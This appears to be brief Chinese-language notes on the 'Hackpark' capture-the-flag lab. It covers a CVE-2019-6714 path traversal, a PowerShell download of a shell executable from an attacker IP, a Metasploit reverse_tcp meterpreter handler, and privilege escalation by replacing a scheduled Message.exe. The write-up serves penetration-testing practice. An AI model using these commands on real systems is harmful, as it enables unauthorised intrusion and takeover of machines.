Hackpark

爆破进后台
CVE-2019-6714
直接利用反弹shell
?theme=../../App_Data/files

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.17.6.173/shell-name.exe','shell-name.exe')"
msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 10000;set payload windows/meterpreter/reverse_tcp;run'

上msf

load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks

Pasted%20image%2020240412144139

这个服务可以利用\

cd "c:\program files (x86)"

然后进去events

cat日志看看

S > cat 20198415519.INI_LOG.txt

08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)
08/04/19 16:47:24,Process Ended. PID:1944,ExitCode:1,Message.exe (Administrator)
08/04/19 16:48:01,Event Started Ok, (Administrator)
08/04/19 16:48:18,Process Ended. PID:712,ExitCode:1,Message.exe (Administrator)
08/04/19 16:49:00,Event Started Ok, (Administrator)
08/04/19 16:49:23,Process Ended. PID:1936,ExitCode:1,Message.exe (Administrator)

以管理员权限运行message

替换一下这个message
cd "C:\program files (x86)\SystemScheduler\Message.exe"

提权成功

powershell -c "Invoke-WebRequest -Uri 'http://10.17.6.173/WinPEAS.bat' -OutFile 'c:\windows\temp\winpeas.bat'"

提一嘴,windows\temp全局可写